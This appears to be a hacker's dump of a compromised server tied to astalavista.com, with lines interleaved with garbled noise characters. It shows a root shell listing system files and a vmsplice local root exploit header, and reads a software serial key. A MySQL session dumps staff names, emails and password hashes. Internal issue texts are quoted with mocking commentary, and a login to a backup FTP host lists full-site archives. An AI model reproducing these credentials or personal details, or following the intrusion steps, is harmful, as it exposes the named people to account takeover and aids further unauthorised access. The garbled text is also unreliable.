" z4 c7 s2 @8 C( D-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
3 Q: `1 r! i2 [) C7 Y" }-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc6 O1 G) Q8 R% t' J( ]$ p
drwx–x–x 3 com com 4096 Jan 29 2008 domains
. ?1 { m; |7 Q+ E-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed4 K- u5 F; |6 c7 z: n$ q, T- }
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
8 }. f+ ]; f+ f+ P" d% J. O3 c& o( o-rw——- 1 com com 69 Nov 18 2008 .lesshst
, e; Q- _& `$ A7 j- |- c$ [drwx—— 2 com com 4096 Sep 24 2007 mail/ f/ U+ ~* T# {4 Q* q
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history6 t$ n& x* L- X+ z) ~8 o
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
( J/ `) b6 `3 flrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html% L' R- {( P/ ?8 S
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow! c+ } B t* A- e6 ~
drwx—— 2 com com 4096 Aug 26 2008 .ssh
+ C5 W3 @. t0 C-rwx—— 1 com com 8515 Feb 10 2008 t+ B1 @% T# h8 ]2 ?' a- K: M
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
8 `. y* T+ d, r0 Tdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
0 M3 P% f& {% |-rw-rw-r– 1 com com 617 May 20 2008 .toprc
% _' T# ~+ j! K# g$ E5 f% ~-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
: I3 \; H# r8 }. G. N( l! h-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
2 y" j) D8 F( }$ y3 c6 J* K-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
& W( O9 r, B$ g; o+ I/ f- p+ ]
8 M. m/ M! i/ q5 Y+ Msh-3.2# head t.c
5 V, b( l4 p! x# r% z: k' b! J/*
" G" L! x0 P4 t' J. H0 {9 O" y* jessica_biel_naked_in_my_bed.c
: ?9 q. u: l- J" ]+ `4 c8 {4 X. B*
% D) F# s7 ^5 l' ?9 A' d) _' G* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
. A, f6 h. L3 q7 Y* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
7 d" v1 H3 {/ Q9 Q) h `6 A" ~: `3 _* Stejnak je to stare jak cyp a aj jakesyk rozbite.
! V: q0 ~+ W: I; J, c9 ^*
8 u9 u# q. @) i7 V8 d, H1 _% G" H* Linux vmsplice Local Root Exploit
9 A8 l! E, e: Y# a1 ?' A" Z0 X* By qaaz
6 ] c) N7 z. l5 o' p& w*! |! R* X7 z" ?! i$ E
# [4 a, {+ ^9 e0 D; W' `sh-3.2# cd /5 _2 G% W, r4 l; O( h( |
sh-3.2# ls -la, C/ u: o4 b& [& ]+ H
total 3607 f* l: V+ ` v
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .4 ?" c1 i7 C8 I* V: _6 H
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
! c! l. N: W e, \" o/ E* L0 \5 h6 V-rw——- 1 root root 10240 Jun 3 02:39 aquota.group& n8 y. |5 S7 K5 x9 [ `
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
9 b! b+ u/ l; O3 k-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
0 H# d! m7 L* ~; H) G-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck, u' t" W* c1 V5 [
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel; b9 d, f9 I, F
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
P% q+ s) U) f U% B8 Mdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
9 o" V$ h1 U, x: |6 pdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
3 i# N* v+ d& v4 F* fdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
% T$ p6 a2 ^7 T3 Kdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
1 @- J) a3 m6 P) g7 Fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home( W1 r- W4 T! A. p
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf, D; @- N9 T3 I
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
" `& c- C6 \( @# C% N7 fdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64% U0 Y- Z- H' E9 W6 d7 a/ H: t
drwx—— 2 root root 16384 Sep 11 2007 lost+found1 R3 ~: K& u$ V Z2 `
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media8 J9 B- E9 E0 t3 u: H8 t7 f
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
$ ^! h. V/ [ g! ldrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
$ D3 \( k* X; h! l-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg6 }7 y3 O& l' y7 ~- O
drwxr-xr-x 2 root root 0 Jun 3 02:43 net/ P7 Q( V% y! r3 d
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt4 Q' J6 @% I, |- I+ c& Y/ l
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
0 b _ a. w' l2 S! E4 G/ odrwxr-x— 15 root root 4096 Jun 4 08:40 root
; i1 x( B5 x* W' z( ~7 W! Gdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
% \2 A3 F% c! z$ V N& w# Idrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
0 @( w+ W; t! L. V4 \+ {3 X! g) L8 Fdrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv5 r" c( T J1 x6 C6 i9 b/ ]
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys/ g, }9 d7 P6 A1 s8 ^
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp, ?" j+ P& w" D
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr! y$ r$ ?( [9 R! g* ^, p
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var1 V5 R6 }: j, Z4 W, ~
+ Q8 t* ?, p" P9 Ish-3.2# cd opt( K* }% W) o$ @9 \+ h6 S
sh-3.2# ls -la
: Q+ s9 c8 o' z- \7 \* Ktotal 20
" j0 g+ |4 w5 k7 E9 Y; v* ndrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
8 ^3 P. h8 l' Z! X, d7 N1 n3 ydrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
' \* s- U; Y! ? ]: w+ t: sdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
$ o5 `- m2 ]6 Q8 J" B" P9 g. g, s/ [2 r0 i' }/ O0 P# D
sh-3.2# cd lsws/
: `' P! j4 x; Rsh-3.2# ls -la
$ |- K9 b2 L/ L/ V' p- xtotal 1082 k' d' E* m, I7 j! _ q: H
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
8 D$ R0 h3 n7 g; C v3 ydrwxr-xr-x 3 root root 4096 Mar 11 17:56 .., k; ?# O) T8 X _2 {9 h3 i
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
, u3 [. ?7 s6 L9 odrwxr-xr-x 13 root root 4096 May 29 15:10 admin; y. \3 f# h/ B
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
6 r* `" Q5 Z9 J' I$ ]drwxr-xr-x 2 root root 4096 May 29 15:10 bin5 l3 ]0 _. i! ]4 Z! v! ?" Y/ K
drwx—— 4 apache apache 4096 Jun 3 02:43 conf& d" L8 e- s% W9 ^% d" v
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT! M) v9 a4 l' [7 D, h* l3 A/ y
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs/ u8 g! x' S; K- m+ @. U- m( k
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
/ Q2 T @7 K+ s, y( E# sdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib8 m2 k0 C/ D7 o6 n
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE' X0 @. A) f3 S0 ~
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
$ z3 {# u0 F+ N1 X8 R$ t5 a; z-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL# T. K F/ l# _- A/ `
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP- C' V4 P7 J, s# ^; o# l
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs3 K, P+ V1 f" V( s8 c
drwxr-xr-x 2 root root 4096 Mar 20 2008 php! @* a: b( R4 R# E1 F: b2 g2 [
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild3 d: z2 G0 q1 Y' a- p7 w: E( h* p
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
7 x; P. V+ ? @( p' {: }4 F- A-rw-r–r– 1 root root 6 May 29 15:10 VERSION8 U& _" P/ \ T' @
: p! C% Y, b8 O9 p0 ~sh-3.2# cd conf$ C2 C9 f/ A3 a0 j( _) B4 j
sh-3.2# ls -la
5 {6 F5 j: b* M; Wtotal 48# e7 e! W# o! j( i0 |$ R, z* F8 k
drwx—— 4 apache apache 4096 Jun 3 02:43 .
& p% r5 I1 D: Tdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..7 |9 J$ j- X0 ]3 ]+ }6 r
drwx—— 2 apache apache 4096 Mar 20 2008 cert6 ] n& L' Y* V" s
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml4 {9 u% }0 E, @- L9 N
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
# C) ? O, S5 M) G: q9 V4 {+ {' N0 x; X-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
( S) r, O8 D) j" b$ H( q9 z-rw——- 1 apache apache 256 May 29 15:10 license.key
* r$ B. A; u! u2 \) J4 }0 V-rw——- 1 apache apache 256 Mar 21 2008 license.key.old0 Q& p( }. ? \* ^+ E: B5 k
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
" w) m) |4 O$ p. `5 t2 {-rw——- 1 apache apache 20 May 29 15:10 serial.no. W0 a) L; i6 j4 l1 A6 K* q/ p
drwx—— 2 apache apache 4096 Mar 20 2008 templates! j9 ~& E8 s4 z% B0 p
" b9 s5 @/ K9 y) e+ U4 a
sh-3.2# cat serial.no
3 m3 d2 o8 K) a% UIbDl-oVsO-CKqL-wVRa
2 U4 j( J) p9 B) `* M( @1 b# {8 y0 L3 ~& t
sh-3.2# mysql
" y( h z- K; r6 X0 X4 }; |Welcome to the MySQL monitor. Commands end with ; or \g.
# X4 u. \! H$ |4 ?, N0 iYour MySQL connection id is 286844
, S: i4 P1 F0 p* H% m% |Server version: 5.0.45-community-log MySQL Community Edition (GPL)) o. D2 s7 J* z! b
5 f$ f5 V# V" Z5 |& m2 X
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.2 Z8 m) y! ]( f6 |. Q& x. f8 h
; a* @4 J% C; d# [$ f4 Z5 r
mysql> show databases;4 y% k8 n2 a% `
+———————–+% ~, t, n7 F3 k' t0 G, N
| Database |
/ U6 T8 D2 [3 Q/ S+———————–+
- |$ W v/ ^) w* d7 g+ ^| information_schema |
6 e& N( h$ v V5 U# }. g, k- o| astanet_ads |/ q7 V: x& {. k; l' Q: G
| astanet_mailing_lists |
5 x2 H$ l$ Y' x5 T. ]| astanet_mediawiki |
$ e. H1 P6 L, k+ @: G% I9 W/ v' P| astanet_membersystem |, M! \& \! z* d6 x# n3 y
| com_contrexx |9 S7 Q9 k n! `7 O8 C7 Q6 M
| com_contrexx2 |
+ l" p# w; U4 f| com_contrexx2_live |
! U0 Y& ^/ M+ i- O| da_roundcube |, |) {2 d# r* ^
| dolphin |
, ?6 P0 r" y! O6 g. I, S9 P| ideapool | d0 S% D, ~$ i7 g( l
| mysql |
% \4 g6 c+ w f" ?1 b( S6 z( y) O| test |% L: x& x' P8 }5 i1 D! _( \+ c
| yourmaster |
0 P' i2 a( K }0 u8 _+———————–+0 t! @$ t. X& m
14 rows in set (0.00 sec)
. K& M2 d- E' Q6 }& t7 `# m) [4 j) [0 N) C4 {6 x
mysql> use ideapool
. [, e1 q4 D0 eDatabase changed
$ F9 q! w: V7 @" ^, G+ k0 H4 Tmysql> show tables;
4 k" Y# f1 m8 G3 j+———————————–+
+ K6 p8 G8 Z1 H Z5 z5 a1 n| Tables_in_ideapool |
8 p1 a0 f% u L ` i+———————————–+
# s' v& [3 C2 N| eventum_columns_to_display |
! N7 W. O. x- l9 {| eventum_custom_field |% i! \0 L+ x( g" `
| eventum_custom_field_option |
$ e& F9 P: M6 ?0 F| eventum_custom_filter |8 h6 ?$ N0 \% _7 \7 S8 i) b6 n
| eventum_customer_account_manager |
; {: S$ q1 T- o, x; L| eventum_customer_note |9 g+ F) a, E6 h2 w
| eventum_email_account |
) m! e: @' }' C: M& z3 Y+ o| eventum_email_draft |
# l8 i9 R, d+ o0 t6 i& l| eventum_email_draft_recipient |
8 A+ w) G7 K% `+ ^3 S| eventum_email_response |
0 q* n% e$ D) r| eventum_faq |
I# l1 m R# e& P. U6 g8 I| eventum_faq_support_level |4 f2 E" E* {* Z. T+ _+ k
| eventum_group |0 c) i' P8 K; N* V* K
| eventum_history_type |
8 o0 d/ ^, @+ Y( u' A. W| eventum_irc_notice |
( p; o6 `# V) E7 Z5 e$ i| eventum_issue |" B) {, W" A. l8 [
| eventum_issue_association |
; D" U) i9 _; [% U; N6 k| eventum_issue_attachment |
# K- P, @; a f( _; C9 ^# @| eventum_issue_attachment_file |: M; B9 ]( z5 J, f2 \9 @
| eventum_issue_checkin |9 c. d, f) e, _; r q$ d# i! V' h7 d& p2 `
| eventum_issue_custom_field |
4 ~- {! {5 r8 y- e4 e| eventum_issue_history |
: q r9 Q4 }7 k: @! Z$ b| eventum_issue_quarantine |' m8 J9 o2 ^6 W& ~) E) s4 ^
| eventum_issue_requirement |
l) l4 W' G* m0 j7 N Z8 ?| eventum_issue_user |/ Z% k4 v3 q' E" x# P
| eventum_issue_user_replier |6 j ~. p7 ^$ L/ \
| eventum_link_filter |
: h5 B" B: S& j( x) v4 \| eventum_mail_queue |& A$ E5 P2 G9 b
| eventum_mail_queue_log |
% R' E% d5 \4 G* B0 b7 _9 ?3 e$ z| eventum_news |1 D8 V* ?3 [$ s2 i3 W: x
| eventum_note |. `+ M& ]' i2 j+ Q' k8 H4 r% i% }
| eventum_phone_support |
4 T9 w0 A" k5 t! E9 r9 Q| eventum_project |! M' P4 j6 [7 P2 Y( L) A
| eventum_project_category |. i0 s4 j! O3 n! I$ O
| eventum_project_custom_field |
7 ?! z, a& t( o4 U| eventum_project_email_response |" i( q; B+ n- R
| eventum_project_field_display |" f* c% T6 T, R1 T- u
| eventum_project_group |
: S: I3 v1 N7 s& _/ l| eventum_project_link_filter |3 \1 J2 M4 @& ]% s% f+ ~
| eventum_project_news |
( n- j ~( F) |8 g- X7 F| eventum_project_phone_category |
0 _: a6 C" r3 _; P0 ^+ v: ]! ]$ y| eventum_project_priority |$ {; V. B- k) p4 O) n' Z/ g
| eventum_project_release |
" Q* s) m- b6 F! b+ U4 x| eventum_project_round_robin |
1 B. A# f( ?# f: h% n) L) K6 @| eventum_project_status |
" R) |* p9 J( P; s| eventum_project_status_date |
( @7 [$ ?: f# L M/ e* \3 p| eventum_project_user |9 r7 h2 [; N- c& ^# j! ~
| eventum_reminder_action |
& Q. z! ?7 Z8 |: L, C& G' `| eventum_reminder_action_list |" l& V8 e! H" U+ y$ J) o/ q- x
| eventum_reminder_action_type |0 N9 j6 h* _5 w! k$ a: |/ O
| eventum_reminder_field |5 k& n; ]" D. S$ C% I
| eventum_reminder_history |
3 q9 {1 ] `" o/ F| eventum_reminder_level |. [% Y4 G% m, v/ j! h1 F
| eventum_reminder_level_condition |
\* F4 q9 [. X* x7 J2 D; G4 q& E| eventum_reminder_operator |
5 d* G. z( v: y) K8 z3 X| eventum_reminder_priority |
+ P! f4 g; K2 _5 B2 l! X| eventum_reminder_requirement |3 f' R* r+ r8 C+ i
| eventum_reminder_triggered_action |
- `1 Y+ {: N4 h/ g) D| eventum_resolution |, Z y. T0 U$ S/ q' z! r2 ~& l
| eventum_round_robin_user |
9 Z3 s) `+ y$ F A5 A2 K| eventum_search_profile |
1 O! g: S2 c. I5 P; @7 c5 x- || eventum_status |8 Y! P1 W N3 U) m; r
| eventum_subscription |+ }& g; p \7 x3 o) f$ L
| eventum_subscription_type |
; \' v* I& h6 W' T4 Q| eventum_support_email |2 d/ @6 \' u' ~5 l6 r9 j/ H$ G1 w
| eventum_support_email_body |# v6 v8 k5 N& G7 j: b
| eventum_time_tracking |) i8 A3 `, J2 h" K+ b8 F }
| eventum_time_tracking_category |6 N9 Y% O# I/ m' n$ s2 H, A
| eventum_user |6 T, F. K. v$ \ C- K6 { D$ A
+———————————–+
F/ T/ [6 C; p' _8 m+ P& W69 rows in set (0.00 sec)
. h3 M# v6 I& B' F: J1 r% g9 Y# V1 {2 }
mysql> describe eventum_user;) Y( h0 R$ O! n+ ?" e/ |
+————————-+——————+——+—–+———————+—————-+7 s3 v* i! j% F. r& U1 ~
| Field | Type | Null | Key | Default | Extra |& n! _1 x" |! ?
+————————-+——————+——+—–+———————+—————-+
2 E, U' o) \4 ]6 t. o, Q| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
9 f% l/ x" C& e: x| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
. `' U. P4 o8 J' S/ T| usr_customer_id | int(11) unsigned | YES | | NULL | | D( @: |' u5 C
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
* u# {( U) o! z% F$ s| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |! `# A3 C% D* E
| usr_status | varchar(8) | NO | | active | |, O5 k$ i# E5 S/ L
| usr_password | varchar(32) | NO | | | |
A1 L# k4 O) A$ ~- l# ^$ }7 R| usr_full_name | varchar(255) | NO | | | |* w- G$ B7 c3 P- i! p5 C
| usr_email | varchar(255) | NO | UNI | | |: d) V4 l$ ?' D2 |1 U
| usr_preferences | longtext | YES | | NULL | |
& I1 S+ N, e& ~% b| usr_sms_email | varchar(255) | YES | | NULL | |
* t- @: S* c) h( t6 M& Q| usr_clocked_in | tinyint(1) | YES | | 0 | |$ O3 O2 c! b9 T$ P6 h7 B; W' ?+ W7 a
| usr_lang | varchar(5) | YES | | NULL | |
6 j$ W+ u! k( c1 [% y+————————-+——————+——+—–+———————+—————-+
" ]% f2 @9 k5 Z5 d6 ~13 rows in set (0.00 sec)
% U6 r! C# C/ {' c* l9 u' S( F: {0 `$ C! E
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
6 M8 g- a1 a, L5 \9 V+———————-+——————————-+———————————-+
. W5 S* m7 P+ t t+ o7 k* ~" m) A| usr_full_name | usr_email | usr_password |
9 x" n% ]8 ^# l3 ]+———————-+——————————-+———————————-+
1 c% r- ^9 ~2 M! S% I4 D| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
" l- R: A+ ~" d/ x2 @, {8 w| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |4 b7 x" K/ E0 ]5 v! p
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
9 ]( r$ i( J: X* o2 ^: h| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c | _" `# ]' h9 y
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |: m2 S' f1 H z# w7 t! r
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
Z9 x; e7 G$ r* g5 I$ ]- y! { i( U| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
- Y6 }* U6 ?+ M( O| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |$ {+ ^- t2 j- B2 c7 R# B
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |+ i( Z/ Z2 _1 P4 @2 g
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |+ M. ?* v5 S* X3 U. [$ j6 }/ o
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
' U8 p( D0 _) m! l# F0 O| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |$ C3 v- r; c/ s$ o
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
/ u1 p& {) ]- K1 g1 R* w7 G| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
% W% I" \) \: ]7 L| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |4 E4 {) k( [' Z# H4 ?
+———————-+——————————-+———————————-+, k& R$ K7 \+ i' M
15 rows in set (0.00 sec)$ V' `6 E) @2 ?# b7 z% ?
( p4 C+ R" E/ {. G# f
mysql> select iss_description from eventum_issue where iss_id = 43;+ u+ Z! ]' i) g7 |9 P- T0 Q
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
" Z5 M, ~' ~4 r# B+ {5 Y" ?| iss_description
* m4 K7 B& H( R* i) I6 F; C6 U) |' J' S|1 R( ~4 q: q3 o+ b! M
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+$ ]9 m# Z9 h* t+ x" Q' ^! u8 d7 ?
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be% H2 V% i6 N& x. t" _' p7 Y
connected for 90 mins… 120mins… so what i propose is something like:
$ S& k* L7 g( {* x; V& W链接标记[url]http://www.surfthechannel.com/[/url]$ c/ |( D0 h0 B1 }7 b
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system8 V5 ?) G, A+ C i2 \( d
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
& H: P( n6 N4 h1 t- K% Q- Lbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off0 s8 g; f& X, N0 p% v. N
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…7 k% T/ T* i; z, E- j
' C6 \, y1 s, J9 C! E2 ^- U7 W
We could also put advertisement during play on the flash video player itself… extra $$…# n, z% p2 g7 G" x& a5 Q. I
1 `/ G+ |5 B7 l+ z/ N# c! W* S1 rBy sykadul |% Y/ X1 m4 g3 z+ g! j( I W7 Y2 M
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+' ^8 g9 k( w$ e4 R
1 row in set (0.00 sec)9 s- I4 H% Z4 ^9 i" Z; ?! a( H) f, u8 x
. n8 u$ K2 \9 ^
// Money and extra $$ is all they care about. remember that.
0 q. K7 Q( C9 @5 U' P4 {1 X: |) f6 X6 _4 w: @# `( l+ Q
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;1 A9 `' v0 a* c. g+ N9 V/ g
+————————+——————————————————————————————————————————————————————————————————————————————-+0 E1 R( W3 Y8 X, s& b$ O
| iss_summary | iss_description , k |! X+ l9 L J
|6 ?: L# o# {* `/ _
+————————+——————————————————————————————————————————————————————————————————————————————-+$ i( ^8 v) j6 p. v
| Forum for REAL EXPERTS | Hello,
1 v& R v% X! X5 Z; J8 V; a* J5 F: d( C
Ishtus and I,3 u& v n3 c% N) g( n6 J5 W
6 U3 i2 G' k) |7 L" c; Z& z
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
+ _8 @* \$ x2 ?, bONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
+ ?$ h, r2 H. u- m- u2 F0 Y s, z f
One example a friend of mine from coresecurity.com!
; R I6 G% U! N7 x
; i# X' d/ m2 O4 mWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
P; L. P7 T5 M$ C! U
- i; ~2 A& M- Q9 U# S|
. G# B. I' h% z, j+ v2 _$ E+————————+——————————————————————————————————————————————————————————————————————————————+
# `* ~0 K3 J- K8 u1 row in set (0.00 sec)
, P$ ~0 b% W; T- w9 p4 B
+ k, P1 m: r3 e8 j! ^// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…8 X. L, ^6 q$ a" h6 K+ D) D4 T T
: }" N2 D8 O' m G) q& G$ B
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
( x/ |5 t+ A( `6 l& x+——————+———————————————————————————————+
4 x5 H, L1 z }* l| iss_summary | iss_description |6 `: x. _3 {8 f7 O4 o
+——————+———————————————————————————————+
& ` J) k8 T: T| Website guidance | Virtual Girl which guides you trought the website.
6 p3 w; Q" ?9 t. B) k
, R# [# b+ O1 \4 r# U/ aWe need a girl with who you can ( talk )!!!( F% a( ]( z. {
Also for the News!, m$ ]1 C$ t- H1 p# z" b0 |
So my suggestion is a girl who read you the news loud if you like!4 q, V: i8 k4 |- U5 i
you can choose between read yourselfe or she read it for you or both!! ` O* t1 @$ B0 z5 _
; l2 x. x/ T) w) B* ~5 x9 jGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!( z0 R2 \6 v0 p/ z+ a$ B
" ? O1 _9 i3 @8 @Have a look on the example girls!!
+ k6 q, W5 D1 ?2 s3 _ {1 S b& e4 V% ~
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]: p( O' `( D7 X' o" Z* y& Y. U
6 n& w( Q- G3 d3 F* G1 V& Ior that
9 \7 l* a4 [# @9 a
' o5 J4 n* m2 `5 y- m链接标记[url]http://www.yellostrom.de/[/url]2 U8 Z4 l+ [3 ?! t8 v3 J
3 h4 f& [, U1 X8 Y
|8 ^1 X# v+ A' i" g
+——————+———————————————————————————————+
! K& l U/ h i' F& F: Z1 row in set (0.00 sec)
. K! c& k/ C/ K2 O' }. _) R$ U; N# D9 F, m9 |0 I Y P
// ha ha.
0 h) t; C! q' O* t4 i% B
9 U7 _. q; k8 V- m2 Nmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
- a- K6 K# E- W# |7 _0 s+————————–+———————————————————————————————————–+% |' O8 Z ^3 g
| iss_summary | iss_description |7 ?; L$ Y9 L% S8 s" Q
+————————–+———————————————————————————————————–+/ x: ]2 B. A& K. J* a
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
+ x6 k+ [6 [5 x7 L' I1 L+————————–+———————————————————————————————————–+" H9 ?7 u, S2 M
1 row in set (0.00 sec)9 p/ w w" D- M) l$ o/ g) ~
$ w( ]( W H8 d. K/ j7 C4 k+ P
// LOL.
& }# v% g; F( a2 i; d" r) p$ o9 L8 K* w1 S
mysql> exit
2 S& s( s: j# ^: D0 ?Bye
3 v( V4 a3 M. e# }1 m, F# ~) D- N8 M6 N; Y. B1 t8 c
sh-3.2# ftp 212.254.194.163
! i# _" v* P$ R8 ?Connected to 212.254.194.163., d4 ]7 h2 i7 S
220 BackupCOM_VW FTP server ready.
8 p+ t. d( l$ {3 M! H. b4 c504 AUTH: security mechanism ‘GSSAPI’ not supported.
' s! Z. R; j4 M" q9 }+ @504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.$ D+ q1 U% a X( C& q
KERBEROS_V4 rejected as an authentication type
; i2 k N' W, _; e @Name (212.254.194.163:root): astalavista.com
1 ^. h- u& e5 ?331 Password required for astalavista.com.9 j) D7 A. a8 w: o$ N- N
Password:$ {, }3 `7 D# a5 \! X) ~! ?" j+ b
230 User astalavista.com logged in.) H3 ]) ]( W0 K; \# }- m( s
Remote system type is UNIX.
; u; ^" Z: p* t3 A# PUsing binary mode to transfer files.
3 M5 @7 |( o+ B* q$ g$ rftp> ls -la
# s2 X/ y6 m, Z3 k1 M227 Entering Passive Mode (212,254,194,163,2,188)
2 {1 B: q3 H6 W. b" _8 }150 Opening BINARY mode data connection for ‘file list’.) k+ p" a$ u5 Q' _ x
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
! o: }! `4 k2 [1 \# \! R) S# P/ v226 Transfer complete. _* ~! D* J1 ^3 h: {- \4 \
ftp> cd astalavista.com" c3 C9 t& t8 v9 v, B
250 CWD command successful. W" M A. Y' W/ u3 h) z
ftp> ls -la; i' g5 G$ I K6 _9 Z* ^' e& H
227 Entering Passive Mode (212,254,194,163,2,189)
w6 a d+ |: C% Q$ W150 Opening BINARY mode data connection for ‘file list’.
* B' j- W: C D0 i2 p2 c4 R8 ^-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
! w& s0 G! ~% v-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2& Q5 N8 S* J: A e' Y% k1 y, A' {
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
, l3 D1 H( @6 c-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar8 F0 i. S* p3 q0 X$ v4 Z) i
